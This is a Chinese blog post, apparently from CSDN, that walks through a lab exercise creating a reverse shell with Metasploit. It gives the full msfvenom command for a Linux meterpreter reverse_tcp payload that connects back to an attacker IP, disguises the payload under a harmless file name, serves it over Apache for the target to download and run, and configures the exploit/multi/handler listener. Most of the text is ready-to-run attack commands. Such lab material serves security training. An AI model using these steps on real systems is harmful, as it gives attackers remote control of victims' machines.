利用 metasploit 创建反弹 shell实验

metasploit 简介

metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。

实验步骤

1、生成被控端并在靶机运行

①生成程序

1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=4443 -f elf > cute_dolphin.bin

在这里插入图片描述

2.将文件复制到网站的目录(/var/www/html)下

cp cute_dolphin.bin /var/www/html

ls 查看指定目录下的所有文件
在这里插入图片描述

②启动apache2服务

启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述

③在靶机中下载

1.在bee-box的浏览器输入:192.168.137.128(kali的IP)/cute_dolphin.bin ,下载payload文件
在这里插入图片描述

2.添加执行权限

chmod +x cute_dolphin.bin

在这里插入图片描述

2、建立连接

①启动metasploit

在这里插入图片描述

②配置参数

⑴进入handler模块
use exploit/multi/handler
在这里插入图片描述

⑵设置攻击载荷
set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述

⑶设置lhost为kali的IP
set lhost 192.168.137.128
在这里插入图片描述

⑷设置lpost
set lport 4443
在这里插入图片描述

⑸运行靶机上文件,会话建立
在这里插入图片描述
在这里插入图片描述

拓展

1、查看帮助信息

msfvenom --help

在这里插入图片描述

2、查看所有可以使用的攻击模块

msfvenom -l payloads

在这里插入图片描述

3、查看攻击载荷需要设置的参数

msfvenom --list-options -p linux/x86/meterpreter/reverse_tcp

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨染秋瑟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值